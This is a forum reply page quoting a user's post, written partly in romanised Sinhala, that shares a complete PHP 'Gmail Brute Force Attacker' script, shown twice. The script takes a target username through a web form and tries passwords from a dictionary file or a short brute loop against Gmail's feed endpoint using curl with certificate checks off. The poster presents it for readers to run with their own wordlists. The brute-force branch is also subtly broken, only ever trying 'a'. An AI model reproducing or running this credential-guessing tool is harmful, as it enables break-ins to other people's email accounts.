Reply to thread

Message

<blockquote data-quote="hirushan" data-source="post: 3434415" data-attributes="member: 31863">Gmail Hack With Brute Force Testing Version[PHP]&lt;?php//////////////////////////Gmail-Brute/////////////////////////////////////////////////////# This script was created to Brute Force G-Mail Logins,##it Uses CURL and 2 Methods of Login attacks (Brute Force and Dictionary) #////////////////////////$dic =&quot;your Dictionary file here.txt&quot;;///////////////////////echo &quot;&lt;title&gt;Gmail Brute Force Attacker&lt;/title&gt;&lt;/head&gt;&lt;style type='text/css'&gt;body {font:Verdana, Arial, Helvetica, sans-serif;font-size:12px;border-color:#FFFFFF;}.raster_table {background-color:#444444;border-color:#CCCCCC;}.alert {&nbsp; &nbsp; color:#FF0000;}&lt;/style&gt;&lt;body&gt;&lt;table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'&gt;&lt;tr&gt;&lt;td&gt;&lt;div align='center'&gt;&lt;b&gt;Gmail Brute Force Attacker&lt;/b&gt;&lt;/div&gt;&nbsp; &nbsp; &nbsp; &nbsp; &lt;/td&gt;&nbsp; &nbsp; &lt;/tr&gt;&lt;/table&gt;&lt;table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'&gt;&nbsp; &nbsp; &lt;tr&gt;&nbsp; &nbsp; &nbsp; &nbsp; &lt;td&gt;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;div align='center'&gt;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;/div&gt;&nbsp; &nbsp; &nbsp; &nbsp; &lt;/td&gt;&nbsp; &nbsp; &lt;/tr&gt;&nbsp; &nbsp; &lt;tr&gt;&nbsp; &nbsp; &nbsp; &nbsp; &lt;td&gt;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;div align='center'&gt;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;/div&gt;&nbsp; &nbsp; &nbsp; &nbsp; &lt;/td&gt;&nbsp; &nbsp; &lt;/tr&gt;&nbsp; &nbsp; &lt;tr&gt;&nbsp; &nbsp; &nbsp; &nbsp; &lt;td&gt;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;div align='center'&gt;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;form method='post'&gt;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Username to brute:&lt;br&gt;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;input name='username' type='text' /&gt;&lt;br&gt;&lt;br&gt;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;input name='attack' type='submit' value='dictionary' /&gt; - &lt;input name='attack' type='submit' value='brute' /&gt;&lt;br&gt;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;/form&gt;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;/div&gt;&nbsp; &nbsp; &nbsp; &nbsp; &lt;/td&gt;&nbsp; &nbsp; &lt;/tr&gt;&nbsp; &nbsp; &lt;tr&gt;&nbsp; &nbsp; &nbsp; &nbsp; &lt;td&gt;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;div align='center'&gt;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;/div&gt;&nbsp; &nbsp; &nbsp; &nbsp; &lt;/td&gt;&nbsp; &nbsp; &lt;/tr&gt;&lt;/table&gt;&quot;;// Sets variables and retrives google error for comparingif(isset($_POST['attack']) &amp;&amp; isset($_POST['username'])) {&nbsp; &nbsp; $username = $_POST['username'];&nbsp; &nbsp; $headers = array(&nbsp; &nbsp; &quot;Host: mail.google.com&quot;,&nbsp; &nbsp; &quot;User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4&quot;,&nbsp; &nbsp; &quot;Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5&quot;,&nbsp; &nbsp; &quot;Accept-Language: en-us,en;q=0.5&quot;,&nbsp; &nbsp; &quot;Accept-Encoding: text&quot;, # No gzip, it only clutters your code!&nbsp; &nbsp; &quot;Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7&quot;,&nbsp; &nbsp; &quot;Date: &quot;.date(DATE_RFC822)&nbsp; &nbsp; );&nbsp; &nbsp; $c = curl_init('https://mail.google.com/mail/feed/atom');&nbsp; &nbsp; curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication&nbsp; &nbsp; curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers&nbsp; &nbsp; curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!&nbsp; &nbsp; curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow&nbsp; &nbsp; curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);&nbsp; &nbsp; curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);&nbsp; &nbsp; curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised&nbsp; &nbsp; $wrong = curl_exec($c); // Get it&nbsp; &nbsp; curl_close($c); // Close the curl stream}//Dictionary Attackif($_POST['attack'] == &quot;dictionary&quot;) {&nbsp; &nbsp; $Dictionary = file(&quot;$dic&quot;);&nbsp; &nbsp; for ($Position = 0; $Position &lt; count($Dictionary); $Position++) {&nbsp; &nbsp; &nbsp; &nbsp; $Dictionary[$Position] = str_replace(&quot;\r\n&quot;, &quot;&quot;, $Dictionary[$Position]);&nbsp; &nbsp; &nbsp; &nbsp; if(check_correct($username, $Dictionary[$Position])) {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; die(&quot;&lt;table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'&gt;&nbsp; &nbsp; &lt;tr&gt;&nbsp; &nbsp; &nbsp; &nbsp; &lt;td&gt;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;div align='center'&gt;&lt;b&gt;Found the password of: &quot;.$Dictionary[$Position].&quot;&lt;br&gt; For the account: &quot;.$username.&quot;&lt;/b&gt;&lt;/div&gt;&nbsp; &nbsp; &nbsp; &nbsp; &lt;/td&gt;&nbsp; &nbsp; &lt;/tr&gt;&lt;/table&gt;&lt;/body&gt;&lt;/html&gt;&quot;);&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; }&nbsp; &nbsp; echo &quot;&lt;table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'&gt;&nbsp; &nbsp; &lt;tr&gt;&nbsp; &nbsp; &nbsp; &nbsp; &lt;td&gt;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;div align='center'&gt;&lt;b&gt;Sorry... a password was not found for the account of &lt;span class='alert'&gt;&quot;.$username.&quot;&lt;/span&gt; during the dictionary attack.&lt;/b&gt;&lt;/div&gt;&nbsp; &nbsp; &nbsp; &nbsp; &lt;/td&gt;&nbsp; &nbsp; &lt;/tr&gt;&lt;/table&gt;&quot;;}//Brute Attackelseif($_POST['attack'] == &quot;brute&quot;) {&nbsp; &nbsp; for ($Pass = 0; $Pass &lt; 2; $Pass++) {&nbsp; &nbsp; &nbsp; &nbsp; if ($Pass == 0){$Pass = &quot;a&quot;;} elseif ($Pass == 1){ $Pass = &quot;a&quot;; }&nbsp; &nbsp; &nbsp; &nbsp; if(check_correct($username, $Pass)) {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; die(&quot;&lt;table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'&gt;&nbsp; &nbsp; &lt;tr&gt;&nbsp; &nbsp; &nbsp; &nbsp; &lt;td&gt;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;div align='center'&gt;&lt;b&gt;Found the password of: &quot;.$Dictionary[$Position].&quot;&lt;br&gt; For the account: &quot;.$username.&quot;&lt;/b&gt;&lt;/div&gt;&nbsp; &nbsp; &nbsp; &nbsp; &lt;/td&gt;&nbsp; &nbsp; &lt;/tr&gt;&lt;/table&gt;&lt;/body&gt;&lt;/html&gt;&quot;);&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; }&nbsp; &nbsp; echo &quot;&lt;table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'&gt;&nbsp; &nbsp; &lt;tr&gt;&nbsp; &nbsp; &nbsp; &nbsp; &lt;td&gt;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;div align='center'&gt;&lt;b&gt;Sorry... a password was not found for the account of &lt;span class='alert'&gt;&quot;.$username.&quot;&lt;/span&gt; during the brute force attack.&lt;/b&gt;&lt;/div&gt;&nbsp; &nbsp; &nbsp; &nbsp; &lt;/td&gt;&nbsp; &nbsp; &lt;/tr&gt;&lt;/table&gt;&quot;;}echo &quot;&lt;/body&gt;&lt;/html&gt;&quot;;// Function for checking whether the username and password are correctfunction check_correct($username, $password){&nbsp; &nbsp; &nbsp; &nbsp; global $wrong, $headers;&nbsp; &nbsp; &nbsp; &nbsp; $c = curl_init('https://'.$username.':'.$password.'@mail.google.com/mail/feed/atom');&nbsp; &nbsp; &nbsp; &nbsp; curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication&nbsp; &nbsp; &nbsp; &nbsp; curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers&nbsp; &nbsp; &nbsp; &nbsp; curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!&nbsp; &nbsp; &nbsp; &nbsp; curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow&nbsp; &nbsp; &nbsp; &nbsp; curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);&nbsp; &nbsp; &nbsp; &nbsp; curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);&nbsp; &nbsp; &nbsp; &nbsp; curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised&nbsp; &nbsp; &nbsp; &nbsp; $str = curl_exec($c); // Get it&nbsp; &nbsp; &nbsp; &nbsp; curl_close($c);&nbsp; &nbsp; &nbsp; &nbsp; if($str != $wrong) {return true;}&nbsp; &nbsp; &nbsp; &nbsp; else {return false;}}?&gt;[/PHP]your Dictionary file here.txt kiyana tanata Ogollange txt file eka daala check karala balanna...........mama tama meka testing......hariyai.....matath yaluwek dunne.........</blockquote>

[QUOTE="hirushan, post: 3434415, member: 31863"] [b]Gmail Hack With Brute Force Testing Version[/b] [PHP]<?php ////////////////////// ////Gmail-Brute////// /////////////////////// //////////////////////// # This script was created to Brute Force G-Mail Logins,# #it Uses CURL and 2 Methods of Login attacks (Brute Force and Dictionary) # //////////////////////// $dic ="your Dictionary file here.txt"; /////////////////////// echo " <title>Gmail Brute Force Attacker</title> </head> <style type='text/css'> body { font:Verdana, Arial, Helvetica, sans-serif; font-size:12px; border-color:#FFFFFF; } .raster_table { background-color:#444444; border-color:#CCCCCC; } .alert { color:#FF0000; } </style> <body> <table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'>Gmail Brute Force Attacker</div> </td> </tr> </table> <table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'> </div> </td> </tr> <tr> <td> <div align='center'> </div> </td> </tr> <tr> <td> <div align='center'> <form method='post'> Username to brute: <input name='username' type='text' /> <input name='attack' type='submit' value='dictionary' /> - <input name='attack' type='submit' value='brute' /> </form> </div> </td> </tr> <tr> <td> <div align='center'> </div> </td> </tr> </table> "; // Sets variables and retrives google error for comparing if(isset($_POST['attack']) && isset($_POST['username'])) { $username = $_POST['username']; $headers = array( "Host: mail.google.com", "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4", "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Language: en-us,en;q=0.5", "Accept-Encoding: text", # No gzip, it only clutters your code! "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Date: ".date(DATE_RFC822) ); $c = curl_init('https://mail.google.com/mail/feed/atom'); curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output! curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1); curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised $wrong = curl_exec($c); // Get it curl_close($c); // Close the curl stream } //Dictionary Attack if($_POST['attack'] == "dictionary") { $Dictionary = file("$dic"); for ($Position = 0; $Position < count($Dictionary); $Position++) { $Dictionary[$Position] = str_replace("\r\n", "", $Dictionary[$Position]); if(check_correct($username, $Dictionary[$Position])) { die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'>Found the password of: ".$Dictionary[$Position]." For the account: ".$username."</div> </td> </tr> </table> </body> </html>"); } } echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'>Sorry... a password was not found for the account of ".$username." during the dictionar y attack.</div> </td> </tr> </table>"; } //Brute Attack elseif($_POST['attack'] == "brute") { for ($Pass = 0; $Pass < 2; $Pass++) { if ($Pass == 0){$Pass = "a";} elseif ($Pass == 1){ $Pass = "a"; } if(check_correct($username, $Pass)) { die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'>Found the password of: ".$Dictionary[$Position]." For the account: ".$username."</div> </td> </tr> </table> </body> </html>"); } } echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'>Sorry... a password was not found for the account of ".$username." during the brute for ce attack.</div> </td> </tr> </table>"; } echo "</body> </html>"; // Function for checking whether the username and password are correct function check_correct($username, $password) { global $wrong, $headers; $c = curl_init('https://'.$username.':'.$password.'@mail.google.com/mail/feed/atom'); curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output! curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1); curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised $str = curl_exec($c); // Get it curl_close($c); if($str != $wrong) {return true;} else {return false;} } ?>[/PHP] your Dictionary file here.txt kiyana tanata Ogollange txt file eka daala check karala balanna...........mama tama meka testing......hariyai.....matath yaluwek dunne......... [/QUOTE]

Verification

Hath warak paha keeyada? (hatha wadikireema paha)

Search

Latest ads

Reply to thread